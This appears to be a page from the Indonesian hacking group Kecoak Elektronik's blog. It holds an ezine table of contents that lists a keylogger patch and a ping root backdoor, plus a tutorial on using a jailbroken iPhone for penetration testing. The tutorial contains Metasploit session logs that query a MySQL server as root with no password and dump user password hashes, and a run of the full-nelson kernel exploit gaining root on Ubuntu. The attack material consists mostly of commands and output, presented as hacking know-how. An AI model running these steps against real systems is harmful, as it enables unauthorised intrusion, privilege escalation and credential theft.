Toket Edisi 7

Kami menyadari bahwa kalian lebih memilih untuk menunggu sajian dari para staff kecoak elektronik daripada mengirimkan kontribusi tulisan melalui CFP yang dirilis, ataupun beberapa merasa minder dan tidak PeDe untuk mengirimkan tulisan kedalam inbox kami (hey, we’re full of positive thinking people in team :> ) sehingga untuk ToKeT edisi 7 ini kami tidak mengeluarkan CFP.

Tidak ada summary pada intro ini mengenai isi artikel, silahkan baca sendiri pada artikel yang tersedia.

0x00 – Introduction ………………………………………………… Byteskrew
0x01 – ProPolice Stack Protector: Review and Hacking! …… Elz
0x02 – The so called heapspray technique …………………….. –
0x03 – FTP Inetutils Client Keylogger Patch ………………….. Pseudoanonymous
PING iputils local root backdoor………………………… Pseudoanonymous
0x04 – Deep Knowledge on Network Hacking Philosopy ….. Pseudoanonymous

Kami menyuguhkan isi tulisan dengan sangat serius. Those are not 30 minutes of work article. So, enjoy them.

GRSecurity Blog

Jika kalian tertarik memplajari security dalam linux lebih dalam maka dapat berkunjung ke forum grsecurity, atau mencoba implementasikan patch grsecurity untuk sistem linux yang kalian maintain, atau membaca patch grsecurity tersebut agar memahami apa saja kelemahan linux yang ditambal, atau…sekedar membaca blog ‘sangat technical’ yang baru-baru ini diluncurkan.

Go read them :>.

“Owned and Exposed” pwned some skiddy

If any skiddy community gets too big, we shut them down. If any lamer causes too much trouble, we shut them down. If any group keeps fucking stuff up, we stop them.

Enjoy the ezine!

Iphone4: Network hacking arsenal in your pocket!

Sementara banyak para 4l4y3rs yang hanya menggunakan hi-tech phone-nya untuk keperluan gaya, gaul dan agak gayus (sedikit dipaksain dan agak ga nyambung), kali saya ingin memperlihatkan penggunaan Iphone untuk keperluan yang jauh lebih berguna yaitu penetration testing.

Setelah melakukan jailbreak, silahkan install OpenSSH, sehingga anda bisa mengakses console via iSSH atau ssh client lainnya.

Elz:/ root# uname -msi
Darwin iPhone3,1 N90AP
Elz:/ root# ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
inet 127.0.0.1 netmask 0xff000000
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
inet 10.xx.xx.xx --> 10.xx.xx.xx netmask 0xffffffff
pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
inet 172.16.0.30 netmask 0xfffffe00 broadcast 172.16.1.255
ether 40:a6:d9:7f:d3:35
en1: flags=8822<BROADCAST,SMART,SIMPLEX,MULTICAST> mtu 1500
ether 40:a6:d9:7f:d3:38

Untuk melengkapi iphone anda dengan hacking tools yang diperlukan maka anda harus menggunakan software manager apt-get untuk menginstallnya. Installasi package manager apt-get bisa dilakukan dari Cydia, setelah sukses anda akan dengan mudah menginstall package-package yang anda butuhkan:

Elz:/ root# apt-get install netcat
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
netcat
0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded.
Need to get 19.9kB of archives.
After this operation, 61.4kB of additional disk space will be used.
Get:1 http://apt.saurik.com tangelo-3.7/main netcat 0.7.1-2 [19.9kB]
Fetched 19.9kB in 14s (1365B/s)
Selecting previously deselected package netcat.
(Reading database ... 5402 files and directories currently installed.)
Unpacking netcat (from .../netcat_0.7.1-2_iphoneos-arm.deb) ...
Setting up netcat (0.7.1-2) ...

Hampir semua tools semacam ettercap, nmap, dsniff bisa anda install dengan mudah layaknya menggunakan laptop atau pc biasa. Sedikit catatan untuk penginstallan metasploit framework3, anda disarankan untuk mengambil package ruby yang compatible dengan msf tersebut.

Elz:/var/ root# wget http://plugin.name/apt.iwatcher.net/debs/-IzQTMa9kmCdKMwOcAhkeQ/ruby_1.8.6-p111-5_iphoneos-arm.deb
Elz:/var/ root# wget http://plugin.name/apt.iwatcher.net/debs/IrGPuK1_wEgo1XNN9tf68g/rubygems_1.2.0-3_iphoneos-arm.deb
Elz:/var/ root# dpkg -i ruby_1.8.6-p111-5_iphoneos-arm.deb
Elz:/var/ root# dpkg -i rubygems_1.2.0-3_iphoneos-arm.deb
Elz:/var/ root# wget http://updates.metasploit.com/data/releases/framework-3.5.0.tar.bz2
Elz:/var/ root# tar jxvf framework-3.5.0.tar.bz2
Elz:/var/ root# mv framework3 msf3
Elz:/var/msf3 root# svn update
Elz:/var/msf3 root# ./msfconsole

|                    |      _) |
__ `__    _  __|  _` |  __| __   |  _   | __|
|   |   |  __/ |   (   |__  |   | | (   | | |
_|  _|  _|___|__|__,_|____/ .__/ _|___/ _|__|
_|

=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 636 exploits - 314 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11385 updated today (2010.12.21)

msf>

So, lets test..

Elz:/var/msf3 root# ./msfconsole

 ____________
< metasploit >
 ------------
          ,__,
          (oo)____
           (__)    )
              ||--|| *


       =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 636 exploits - 314 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11385 updated today (2010.12.21)

msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > set RHOSTS 172.16.0.11
RHOSTS => 172.16.0.11
msf auxiliary(mysql_version) > run

[*] 172.16.0.11:3306 is running MySQL 5.0.86-log (protocol 10)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_version) > use auxiliary/admin/mysql/mysql_sql
msf auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_sql) > set SQL select user, host, password from mysql.user
SQL => select user, host, password from mysql.user
msf auxiliary(mysql_sql) > set RHOST 172.16.0.11
RHOST => 172.16.0.11
msf auxiliary(mysql_sql) > show options

Module options:

   Name      Current Setting                              Required  Description
   ----      ---------------                              --------  -----------
   PASSWORD                                               no        The password for the specified username
   RHOST     172.16.0.11                                  yes       The target address
   RPORT     3306                                         yes       The target port
   SQL       select user, host, password from mysql.user  yes       The SQL to execute.
   USERNAME  root                                         no        The username to authenticate as

msf auxiliary(mysql_sql) > run

[*] Sending statement: 'select user, host, password from mysql.user'...
[*]  | root | localhost |  |
[*]  | root | lab.kecoak-elektr0nik.net |  |
[*]  | root | 127.0.0.1 |  |
[*]  |  | localhost |  |
[*]  |  | lab.kecoak-elektr0nik.net |  |
[*]  | alessio | % | 54830b5b500xxxxx |
[*]  | logbsd | % | 54830b5b500xxxxx |
[*]  | admindodol | % | 2604bebc32bxxxxx |
[*]  | dudun | % | 446a12100c8xxxxx |
[*]  | root | % |  |
[*] Auxiliary module execution completed
msf auxiliary(mysql_sql) >

Tidak ada yang begitu spesial karena penggunaan Iphone sebagai media untuk keperluan penetration testing hampir sama dengan penggunaan laptop, cuma memang jadi jauh lebih mobile karena tidak perlu membawa laptop yang jelas lebih “vulgar”. Hampir semua tools seperti dsniff, arpspoof, ettercap, tcpdump, nmap berjalan dengan sempurna diatas mobile phone milik steve jobs ini. So, do you still love your BB? *lirik scut* 😀

full-nelson.c

$ id
uid=1000(cyberheb) gid=1000(cyberheb) groups=1000(cyberheb),4(adm),20(dialout),24(cdrom),46(plugdev),111(lpadmin),119(admin),122(sambashare)

cyberheb@ubuntu:~/Desktop$ ./full-nelson 
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xe09ff2a0
 [+] Resolved econet_ops to 0xe09ff3a0
 [+] Resolved commit_creds to 0xc016c830
 [+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# uname -a
Linux ubuntu 2.6.35-22-generic #34-Ubuntu SMP Sun Oct 10 09:24:00 UTC 2010 i686 GNU/Linux
# id
uid=0(root) gid=0(root) groups=0(root)

Linux Kernel <= 2.6.37 local privilege escalation by Dan Rosenberg, tested on Ubuntu 10.10. Penjelasan singkat tentang metode eksploitasi dapat dilihat pada blog nelhage.

Page 5 of 37« First...34567...102030...Last »